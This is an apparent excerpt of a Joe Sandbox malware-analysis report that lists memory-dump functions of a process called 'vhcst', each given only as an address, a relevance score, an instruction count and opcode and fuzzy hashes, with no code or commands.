                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13414f7ba7830e387cfde20b6f7dca7dcdcc0078f0d089bda7a51a88de2ff4f5
                                                                                      • Instruction ID: 6f7ef2e59d364fadbe8ce06bce99605f5f64d4904a604a8a0f395a557d1f1ba6
                                                                                      • Opcode Fuzzy Hash: 13414f7ba7830e387cfde20b6f7dca7dcdcc0078f0d089bda7a51a88de2ff4f5
                                                                                      • Instruction Fuzzy Hash: 29910951B0E6C90FEB66EF6848656E97BE1EF4A314B0804FAD459CB1D7CD2A6806C342
                                                                                      Function 00007FFD99E1B2E0 Relevance: .3, Instructions: 289COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ec73a75c02f06d8e43b627685173ddcd6f4decc830dfceb9e6ddb19465358df
                                                                                      • Instruction ID: d290656b123defde270cde4cf3e24f7e5b6f1485fe5d1ecc55ef1294a08a06d1
                                                                                      • Opcode Fuzzy Hash: 6ec73a75c02f06d8e43b627685173ddcd6f4decc830dfceb9e6ddb19465358df
                                                                                      • Instruction Fuzzy Hash: D9B1BF74605A4D8FEBD4EF18C49C7A937E1FB68305F24457E982DCB296DB329892CB01
                                                                                      Function 00007FFD99E10E28 Relevance: .3, Instructions: 284COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7f4f1e340b5ca3a7ab8a50d2a44279991bf73dd84c89c77881b78e436095638f
                                                                                      • Instruction ID: 29b744cc39c76fee5963226fb39718a7e7f4f489fbd5c6261dbb94763d85ecd2
                                                                                      • Opcode Fuzzy Hash: 7f4f1e340b5ca3a7ab8a50d2a44279991bf73dd84c89c77881b78e436095638f
                                                                                      • Instruction Fuzzy Hash: 94711731B0CE494FD768EF6C9865AB9B7E1EF98315F04427ED04EC3395DE25A8428782
                                                                                      Function 00007FFD99E73FF0 Relevance: .3, Instructions: 277COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8df9deeaf6869011696aa38b8f4387ef4bfce2b6495f6bc28986e25c5da032a
                                                                                      • Instruction ID: 230d3c2c70cb4e40e31976c090886c7b4314d6902b4ff1f7759c136caec9b07f
                                                                                      • Opcode Fuzzy Hash: d8df9deeaf6869011696aa38b8f4387ef4bfce2b6495f6bc28986e25c5da032a
                                                                                      • Instruction Fuzzy Hash: 4371F971B1DB088FDB68EE5CA8565B977E1FB99325B10027BE449C3155EA22BC0387C3
                                                                                      Function 00007FFD99E10E38 Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c4e9b073ea20ef00f060385b7973f21af5ad27066abb7f2f07d02947d5e16041
                                                                                      • Instruction ID: 019c2c7e38251cab7ded74c3cf81dfb141b4b1664ebb0622d87b7fb5b287650f
                                                                                      • Opcode Fuzzy Hash: c4e9b073ea20ef00f060385b7973f21af5ad27066abb7f2f07d02947d5e16041
                                                                                      • Instruction Fuzzy Hash: C3715771B0CA484FDB69DE5C98556BAB7E1EB98324F00427FE04DD3296DE35A8028782
                                                                                      Function 00007FFD99E25FE8 Relevance: .3, Instructions: 275COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ebb9c2266a736244db4efa0a6442330b85e3f6c2ae37a93ead5599a0580cf52
                                                                                      • Instruction ID: 12cebfcf034a1011527aab526e4e84c2c63f0ff3893f522c10b0b03e630097e5
                                                                                      • Opcode Fuzzy Hash: 4ebb9c2266a736244db4efa0a6442330b85e3f6c2ae37a93ead5599a0580cf52
                                                                                      • Instruction Fuzzy Hash: 87813971B0EA894FDB59EF6C54A65B877E1EFA9304B0405FED04ACB1E7DD2668028341
                                                                                      Function 00007FFD99E25189 Relevance: .3, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dd73d01c8d932c17132384c48ce11134eaf8d7e8d26d1ab3ca0d38cd2f20e393
                                                                                      • Instruction ID: 19c1438b96fbf2ce6733c4c9437060e228085d60e994afd616cfe9aa3ffb9fe7
                                                                                      • Opcode Fuzzy Hash: dd73d01c8d932c17132384c48ce11134eaf8d7e8d26d1ab3ca0d38cd2f20e393
                                                                                      • Instruction Fuzzy Hash: A4A12F70708A4E8FDB98EF18C4A4AAA73E2FF58315B544569D41EC7296CF31EC92CB41
                                                                                      Function 00007FFD99E2AB81 Relevance: .3, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03e27312dfbf3c1d0dab591b3d708b37875db52187beed97e32ef2764929ec8e
                                                                                      • Instruction ID: fcc0194234284567a36122ff37a73b163d69a3b294a7ae1df0f744e0c5526b49
                                                                                      • Opcode Fuzzy Hash: 03e27312dfbf3c1d0dab591b3d708b37875db52187beed97e32ef2764929ec8e
                                                                                      • Instruction Fuzzy Hash: 98712B22E0D59A4FE771BFB858665ED7BE4EF81328F0841B6D09C8B0D7ED1925198383
                                                                                      Function 00007FFD99E1E85B Relevance: .3, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 033a5e2645e1c37e116b7fb162b299d982a346923ba139eee31f800df0f11bf7
                                                                                      • Instruction ID: 78a3a2d55332bff8d802d09c37336d7ec151b21335f1f876d23b84a0ae6f4971
                                                                                      • Opcode Fuzzy Hash: 033a5e2645e1c37e116b7fb162b299d982a346923ba139eee31f800df0f11bf7
                                                                                      • Instruction Fuzzy Hash: CC91B67071894E8FDBA4EF5CC894AA973E1FF68304B1445A8F41DC729ACA35EC42CB41
                                                                                      Function 00007FFD99E2337D Relevance: .3, Instructions: 271COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42461118977964a65ad96c20f5ad4577fde03d50d0ac861d48146bf488b6309a
                                                                                      • Instruction ID: eb353543599df285c8061dae5b4655ef96da1cb45f39c4781a306319c4f0d40b
                                                                                      • Opcode Fuzzy Hash: 42461118977964a65ad96c20f5ad4577fde03d50d0ac861d48146bf488b6309a
                                                                                      • Instruction Fuzzy Hash: 07811932A4E6C90FE7639BB858655E97FF0EF46224F0801FAD49CCB093D919650A8B53
                                                                                      Function 00007FFD99E21877 Relevance: .3, Instructions: 267COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d4f7394e5305ee444cc8197ba2d936b35497958572576969cb4485f2a3cc13bc
                                                                                      • Instruction ID: 4dd4b78367abdb952ff4a1fd99ab221ad33470733bf60bf5adbd68863af4e3e1
                                                                                      • Opcode Fuzzy Hash: d4f7394e5305ee444cc8197ba2d936b35497958572576969cb4485f2a3cc13bc
                                                                                      • Instruction Fuzzy Hash: 72916370708A4E8FDF98EF58C4A4AA977E1FF58304B54456DD41EC7296CA35EC82CB41
                                                                                      Function 00007FFD99E49E20 Relevance: .3, Instructions: 265COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 249e1e538485e431cadbc3e308e53c95c827c746adc5995d2b836bb3a22bda16
                                                                                      • Instruction ID: ee5d3724efdc221d92582a32ebd909d37203a7c793fbd69ceceadfe42b086fc3
                                                                                      • Opcode Fuzzy Hash: 249e1e538485e431cadbc3e308e53c95c827c746adc5995d2b836bb3a22bda16
                                                                                      • Instruction Fuzzy Hash: 6071253161AE094FD768DF5CC8D59B573E0FB94715B24067EE449C32A2DA26BC428782
                                                                                      Function 00007FFD99E63D58 Relevance: .3, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2ba95f1baae7c49c1a50a8669719c6e687c0eb880070690322a9ad090370f71
                                                                                      • Instruction ID: 47b2806026e4ac585bcada020d9ec1d525269f912d558c6f72cd3035a70f2900
                                                                                      • Opcode Fuzzy Hash: f2ba95f1baae7c49c1a50a8669719c6e687c0eb880070690322a9ad090370f71
                                                                                      • Instruction Fuzzy Hash: E5818130719A098FDB68EF58C494E72B3E1FB98314B24456DD04EC7296CA27FC82C795
                                                                                      Function 00007FFD99E2AA65 Relevance: .3, Instructions: 257COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b48f75b05980aaae6349a35384338806bef197e8c01342876e2def3a72a3f8c
                                                                                      • Instruction ID: 63972bb03da2ff2e99e8bedf5b8e0d7ad2f1f260191aa098a3c4c5ed2e0d3c02
                                                                                      • Opcode Fuzzy Hash: 8b48f75b05980aaae6349a35384338806bef197e8c01342876e2def3a72a3f8c
                                                                                      • Instruction Fuzzy Hash: EF71E33070DA484FDB98EF5CD4A9A7977D1EF99715B1401BEE04EC72A2DA16EC02C742
                                                                                      Function 00007FFD99E2AF80 Relevance: .2, Instructions: 247COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6b193321aef0064e5d20c478590a74639275848cbffdf7635221e08178e0c47
                                                                                      • Instruction ID: b66c4702981a64f635fa84268188f27bf093022d7db6ccec572975769b886569
                                                                                      • Opcode Fuzzy Hash: b6b193321aef0064e5d20c478590a74639275848cbffdf7635221e08178e0c47
                                                                                      • Instruction Fuzzy Hash: FB714730B0D6494FDB15EF6884A19B97BE1FF55314B1401ADE489C72E7CA2ABC42C782
                                                                                      Function 00007FFD99E2B9A0 Relevance: .2, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82e70c6eb36fc0e78549e1c4d63e661731bf30bef65ecb377858e859d3892063
                                                                                      • Instruction ID: 7b1faee2a13038517b5e641851d24dc462e05361ce0aa923c31dc19e11756a09
                                                                                      • Opcode Fuzzy Hash: 82e70c6eb36fc0e78549e1c4d63e661731bf30bef65ecb377858e859d3892063
                                                                                      • Instruction Fuzzy Hash: AD61A33171CA0C8FDB18DE1CD8969B9B7E1FB99724F04126EE44AD3251DE22F8428786
                                                                                      Function 00007FFD99E2AAE0 Relevance: .2, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d3c56e1eba4973345aa086d42ff046db367993e3fdbe26be39c128ef1b23853
                                                                                      • Instruction ID: 62f7f271942cbcd8356b7adbd05c75704e0ec2c865ff7917c68d210bb2488084
                                                                                      • Opcode Fuzzy Hash: 2d3c56e1eba4973345aa086d42ff046db367993e3fdbe26be39c128ef1b23853
                                                                                      • Instruction Fuzzy Hash: EA613D3071994D8FEAA4EF5C88A8B7977D1EF69344F1400B9D48ECB2A6CE25AC458742
                                                                                      Function 00007FFD99E22365 Relevance: .2, Instructions: 235COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 97d134211712bc08c2010c0cecdba2992641120e7f6ecab3732e70cabf7ef639
                                                                                      • Instruction ID: 20629cc4dd1c16bd59833d117fee32001cccf676e28513a542d477fcaef4a299
                                                                                      • Opcode Fuzzy Hash: 97d134211712bc08c2010c0cecdba2992641120e7f6ecab3732e70cabf7ef639
                                                                                      • Instruction Fuzzy Hash: E8810A30705A0E8FDB98EF18C4A4AB973E2FF98315B544569D41ECB396CB35E892CB41
                                                                                      Function 00007FFD99E2A388 Relevance: .2, Instructions: 234COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e21cce09c881797d0eded5d232c45363829687ef6317b7e85d8e2e23d8733d51
                                                                                      • Instruction ID: 389d538ee49f64e0193dbbd71eae67a8d10e40d6122a03d2b800047e001146e3
                                                                                      • Opcode Fuzzy Hash: e21cce09c881797d0eded5d232c45363829687ef6317b7e85d8e2e23d8733d51
                                                                                      • Instruction Fuzzy Hash: 78615B21B0EE8E0FDBA5DF6C48A57B977D1EF69609F04417AD44DC32D7CE2AA8018342
                                                                                      Function 00007FFD99E2AA70 Relevance: .2, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bfda4b50485ddc0d2a91e00594a760218f612834b9de26fbbf89d69db13c5a02
                                                                                      • Instruction ID: c4c79419ebc1a04da564db4ae8000840bc72dcb515a511c6e94f20904be4799b
                                                                                      • Opcode Fuzzy Hash: bfda4b50485ddc0d2a91e00594a760218f612834b9de26fbbf89d69db13c5a02
                                                                                      • Instruction Fuzzy Hash: 4E51FE21F0DE0A0BEB789E9C949567573C1EB98375F14427ED84EC32D6DD16EC824287
                                                                                      Function 00007FFD99E286F0 Relevance: .2, Instructions: 208COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4153bac26cd58e3418f24d3b24a6f8ee74e7a50fe252b5fded6fed2ab2efbb1d
                                                                                      • Instruction ID: e8dc5cd0dc44ba086c55a5790c926021daa1ab5b66cdad8903c0b02ffaa2e299
                                                                                      • Opcode Fuzzy Hash: 4153bac26cd58e3418f24d3b24a6f8ee74e7a50fe252b5fded6fed2ab2efbb1d
                                                                                      • Instruction Fuzzy Hash: 5951E134B19A494FDBA8EF68C0A5A7573D1FFA8314B18017ED44FC32A6DE25E8418742
                                                                                      Function 00007FFD99E55D90 Relevance: .2, Instructions: 203COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cec0f41200565158333dec1ee9a23b81f89262609964d92db4c5d9854cce81a1
                                                                                      • Instruction ID: 04392a4af9e6db46572715c62386150e2c92a787ccbba02019f4dff63261f3c5
                                                                                      • Opcode Fuzzy Hash: cec0f41200565158333dec1ee9a23b81f89262609964d92db4c5d9854cce81a1
                                                                                      • Instruction Fuzzy Hash: 7B512A31B1D9554FEBA4EBAC98A86B537D1FF94328B0541BAD08DC72A3DD15EC428382
                                                                                      Function 00007FFD99E1DA48 Relevance: .2, Instructions: 192COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aec161a123064d7aa47ad6d81e6f39e1bd2fc3b310463bd3022cf34538a50dd1
                                                                                      • Instruction ID: 2269949944d2d9478632190c825ecc6b4443185f62a44346cae89318613f6bfc
                                                                                      • Opcode Fuzzy Hash: aec161a123064d7aa47ad6d81e6f39e1bd2fc3b310463bd3022cf34538a50dd1
                                                                                      • Instruction Fuzzy Hash: 2A51397160EACD0FD756DF7898656E97BE1EF4A310B4806FED489CB2E3CA295802C741
                                                                                      Function 00007FFD99E113ED Relevance: .2, Instructions: 192COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9542b74253bfc25fede70bae46b1b15d0b1f2f852e21dd833078bbb39512f766
                                                                                      • Instruction ID: 82e5b73987feed07c8ce1f64ab8aa6df3c075e8d04725f6a888a0d312cfddb4f
                                                                                      • Opcode Fuzzy Hash: 9542b74253bfc25fede70bae46b1b15d0b1f2f852e21dd833078bbb39512f766
                                                                                      • Instruction Fuzzy Hash: DA712C70E0A64D9FDB95EFA4C8A56ECBBF1EF45304F4005B9D049EB2A2CE392945CB05
                                                                                      Function 00007FFD99E1F551 Relevance: .2, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 383363cd83fac8220425485041f69ef3380cb71d56fef2392cf9f672015bb7ac
                                                                                      • Instruction ID: cfad2475c3056274648cdaae7ee58ba25ee6d3fd7fc44142443adb40a57846c6
                                                                                      • Opcode Fuzzy Hash: 383363cd83fac8220425485041f69ef3380cb71d56fef2392cf9f672015bb7ac
                                                                                      • Instruction Fuzzy Hash: DB51F572F0E9494FEBA5DF6C58B56E97BE1EFA9314B0801BAE04CD72A3CD1578418381
                                                                                      Function 00007FFD99E2B95D Relevance: .2, Instructions: 185COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94be1988b754da998ccfc11bc30d834955f813db50ab6e03620c79ef40672a8a
                                                                                      • Instruction ID: 00af9b39d143e10ff5f69c6c4c5613ad0466e6e1fafa75ad2028738f4eda86fa
                                                                                      • Opcode Fuzzy Hash: 94be1988b754da998ccfc11bc30d834955f813db50ab6e03620c79ef40672a8a
                                                                                      • Instruction Fuzzy Hash: 8141D771B1D6095BEB6CAE5CA8966FE37D1EB99714F04013FF44A832D6DD1678034282
                                                                                      Function 00007FFD99E2667D Relevance: .2, Instructions: 183COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a4195617ea6158b6c11fe9aabe18038ed987203a40a13c4e1b2f1d7b148d7fae
                                                                                      • Instruction ID: cc90f33f80569a4399dbc7b4b01a6ae202b522a9ea4b819be25a31fdd763d190
                                                                                      • Opcode Fuzzy Hash: a4195617ea6158b6c11fe9aabe18038ed987203a40a13c4e1b2f1d7b148d7fae
                                                                                      • Instruction Fuzzy Hash: E9411771F0DE0D4FEBA4EF58A89AABD73D1EFA4714F04017AD40DD319ADD25A8128382
                                                                                      Function 00007FFD99E179D5 Relevance: .2, Instructions: 181COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8533e552f0a398a5329122d7472a25a54f3155444b448fda3854228fb86ec9f
                                                                                      • Instruction ID: 823f06156474d891d6a26ace1a46d4162c7d4cf67a19c14851d543574dd182e1
                                                                                      • Opcode Fuzzy Hash: a8533e552f0a398a5329122d7472a25a54f3155444b448fda3854228fb86ec9f
                                                                                      • Instruction Fuzzy Hash: 21513A91A0F6CA0FE776EB7808656E57FE0FF16214B0808FED4998B0E7DD1A6905C342
                                                                                      Function 00007FFD99E1119F Relevance: .2, Instructions: 181COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc05b83b8a971cef219ee5933960ba0057c2be3c26709a709e38c809d043ca03
                                                                                      • Instruction ID: 97423a378b3696db2eaf286abe3b0dd9455221539f6e991335da1e62f33eb419
                                                                                      • Opcode Fuzzy Hash: fc05b83b8a971cef219ee5933960ba0057c2be3c26709a709e38c809d043ca03
                                                                                      • Instruction Fuzzy Hash: 07616230B0E64A4FEBB5EFA484A16F973A1FF45309F000579E45AC76C6CE2AA841C752
                                                                                      Function 00007FFD99E24786 Relevance: .2, Instructions: 181COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c731d1ee721ec0f490f5e235ab7e2fc89ea2a58539bbfdb1a0c5d7cf0c5b2055
